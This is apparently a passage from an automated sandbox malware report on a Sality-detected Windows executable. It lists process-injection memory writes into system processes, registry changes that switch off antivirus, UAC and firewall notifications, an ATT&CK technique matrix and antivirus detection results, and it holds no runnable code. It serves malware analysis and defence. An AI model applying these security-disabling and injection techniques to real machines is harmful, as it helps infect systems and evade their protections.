        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 950000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\ctfmon.exe base: 870000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\explorer.exe base: B7B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 360000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: AB0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 6A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 1E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: B00000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A00000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\smartscreen.exe base: 910000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: FF0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 220000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: B20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\conhost.exe base: 610000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\conhost.exe base: 5F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: C40000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: C60000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: B90000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\dllhost.exe base: D50000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: BE0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: FD0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: FA0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 220000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\dwm.exe base: 6F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\sihost.exe base: DB0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 480000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 960000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\ctfmon.exe base: 880000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\explorer.exe base: DD50000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 370000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: AC0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 6B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 1F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: B10000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A10000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\smartscreen.exe base: 920000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1000000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 230000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A30000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: B30000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\conhost.exe base: 620000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\conhost.exe base: 600000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: C50000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: C70000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: BA0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\dllhost.exe base: D60000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: BF0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: FE0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: FB0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 230000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\dwm.exe base: 700000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\sihost.exe base: DC0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 490000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 970000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\ctfmon.exe base: 890000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\explorer.exe base: DD60000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 380000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: AD0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 6C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 200000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: B20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\smartscreen.exe base: 930000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1010000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 240000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: A40000
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: B40000
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory written: C:\Windows\System32\conhost.exe base: 630000
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory written: C:\Windows\System32\conhost.exe base: 610000
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory written: C:\Windows\System32\backgroundTaskHost.exe base: C60000
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: C80000
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory written: C:\Windows\System32\svchost.exe base: BB0000
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory written: C:\Windows\System32\dllhost.exe base: D70000
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: C00000
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: FF0000
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory written: C:\Windows\System32\fontdrvhost.exe base: FC0000
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory written: C:\Windows\System32\fontdrvhost.exe base: 240000
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory written: C:\Windows\System32\dwm.exe base: 710000
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory written: C:\Windows\System32\sihost.exe base: DD0000
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory written: C:\Windows\System32\svchost.exe base: 4A0000
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory written: C:\Windows\System32\svchost.exe base: 980000
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory written: C:\Windows\System32\ctfmon.exe base: 8A0000
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory written: C:\Windows\explorer.exe base: DD70000
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory written: C:\Windows\System32\svchost.exe base: 390000
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: AE0000
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 6D0000
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 210000
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: B30000
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: A30000
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory written: C:\Windows\System32\smartscreen.exe base: 940000
        Source: dwm.exe, 0000000E.00000000.1303615224.00000283DBDF1000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000016.00000000.1421498975.000001CF1D3D1000.00000002.00000001.00040000.00000000.sdmp, svchost.exe, 00000017.00000000.1451176012.000001697AB91000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
        Source: dwm.exe, 0000000E.00000000.1303615224.00000283DBDF1000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000016.00000000.1421498975.000001CF1D3D1000.00000002.00000001.00040000.00000000.sdmp, svchost.exe, 00000017.00000000.1451176012.000001697AB91000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
        Source: dwm.exe, 0000000E.00000000.1303615224.00000283DBDF1000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000016.00000000.1421498975.000001CF1D3D1000.00000002.00000001.00040000.00000000.sdmp, svchost.exe, 00000017.00000000.1451176012.000001697AB91000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
        Source: dwm.exe, 0000000E.00000000.1300226546.00000283DB78C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerS
        Source: dwm.exe, 0000000E.00000000.1303615224.00000283DBDF1000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000016.00000000.1421498975.000001CF1D3D1000.00000002.00000001.00040000.00000000.sdmp, svchost.exe, 00000017.00000000.1451176012.000001697AB91000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
        Source: explorer.exe, 0000001B.00000002.3740758912.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.1468114321.0000000000A44000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progmanq
        Source: C:\Windows\System32\dllhost.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformation
        Source: C:\Windows\System32\dllhost.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformation
        Source: C:\Windows\System32\dllhost.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat VolumeInformation
        Source: C:\Windows\System32\dllhost.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm VolumeInformation
        Source: C:\Windows\System32\dllhost.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01tmp.log VolumeInformation
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Code function: 6_2_004ACF60 GetLocalTime,GetSystemTime,GetTimeZoneInformation
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Code function: 6_2_0242F760 lstrcpy,GetUserNameA,lstrlen,lstrcat,lstrlen,lstrlen,RegOpenKeyExA,RegCreateKeyA,RegEnumValueA,RegDeleteValueA,wsprintfA,RegSetValueExA,wsprintfA,RegQueryValueExA,RegCloseKey
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Code function: 6_2_004B672C GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Code function: 6_2_004C6C59 GetVersion,RtlInitializeCriticalSection

        Lowering of HIPS / PFW / Operating System Security Settings

        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center AntiVirusOverride
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Registry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot AlternateShell
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile DisableNotifications
        Source: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile Registry value created: DisableNotifications 1

        Stealing of Sensitive Information

        Source: Yara match File source: Process Memory Space: YMZwp.exe PID: 7348, type: MEMORYSTR

        Remote Access Functionality

        Source: Yara match File source: Process Memory Space: YMZwp.exe PID: 7348, type: MEMORYSTR
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Code function: 6_2_02423911 htons,socket,setsockopt,bind,recvfrom,InterlockedExchange,CreateThread,Sleep,closesocket,RtlExitUserThread
        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | Acquire Infrastructure | 12 Replication Through Removable Media | 3 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 6 Disable or Modify Tools | 1 Credential API Hooking | 12 System Time Discovery | 1 Taint Shared Content | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 Inhibit System Recovery
        Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Windows Service | 1 Bypass User Account Control | 1 Deobfuscate/Decode Files or Information | 1 Input Capture | 11 Peripheral Device Discovery | Remote Desktop Protocol | 1 Credential API Hooking | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Access Token Manipulation | 31 Obfuscated Files or Information | Security Account Manager | 1 Account Discovery | SMB/Windows Admin Shares | 1 Input Capture | 11 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Windows Service | 121 Software Packing | NTDS | 5 File and Directory Discovery | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 52 Process Injection | 1 DLL Side-Loading | LSA Secrets | 23 System Information Discovery | SSH | Keylogging | 13 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Bypass User Account Control | Cached Domain Credentials | 221 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Masquerading | DCSync | 31 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
        Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 31 Virtualization/Sandbox Evasion | Proc Filesystem | 3 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
        Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Access Token Manipulation | /etc/passwd and /etc/shadow | 11 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
        IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 52 Process Injection | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
        [Behavior graph. ID: 1467984; Sample: #U6587#U4ef6#U7279#U5f81#U6...; Startdate: 05/07/2024; Architecture: WINDOWS; Score: 100]

        Source | Detection | Scanner | Label | Link
        #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe | 97% | ReversingLabs | Win32.Virus.Sality |
        #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe | 89% | Virustotal | | Browse
        #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe | 100% | Avira | W32/Sality.AT |
        #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe | 100% | Joe Sandbox ML | |

        Source | Detection | Scanner | Label | Link
        C:\Program Files\7-Zip\Uninstall.exe | 100% | Avira | W32/Jadtre.B |
        C:\Users\user\AppData\Local\Temp\YMZwp.exe | 100% | Avira | TR/Dldr.Small.Z.haljq |
        C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe | 100% | Avira | W32/Jadtre.B |
        C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Avira | W32/Jadtre.B |
        C:\Program Files\7-Zip\Uninstall.exe | 100% | Joe Sandbox ML | |
        C:\Users\user\AppData\Local\Temp\YMZwp.exe | 100% | Joe Sandbox ML | |
        C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe | 100% | Joe Sandbox ML | |
        C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Joe Sandbox ML | |
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | 0% | ReversingLabs | |
        C:\Users\user\AppData\Local\Temp\YMZwp.exe | 100% | ReversingLabs | Win32.Trojan.Skeeyah |

        No Antivirus matches

        Source | Detection | Scanner | Label | Link
        www.careerdesk.org | 12% | Virustotal | | Browse
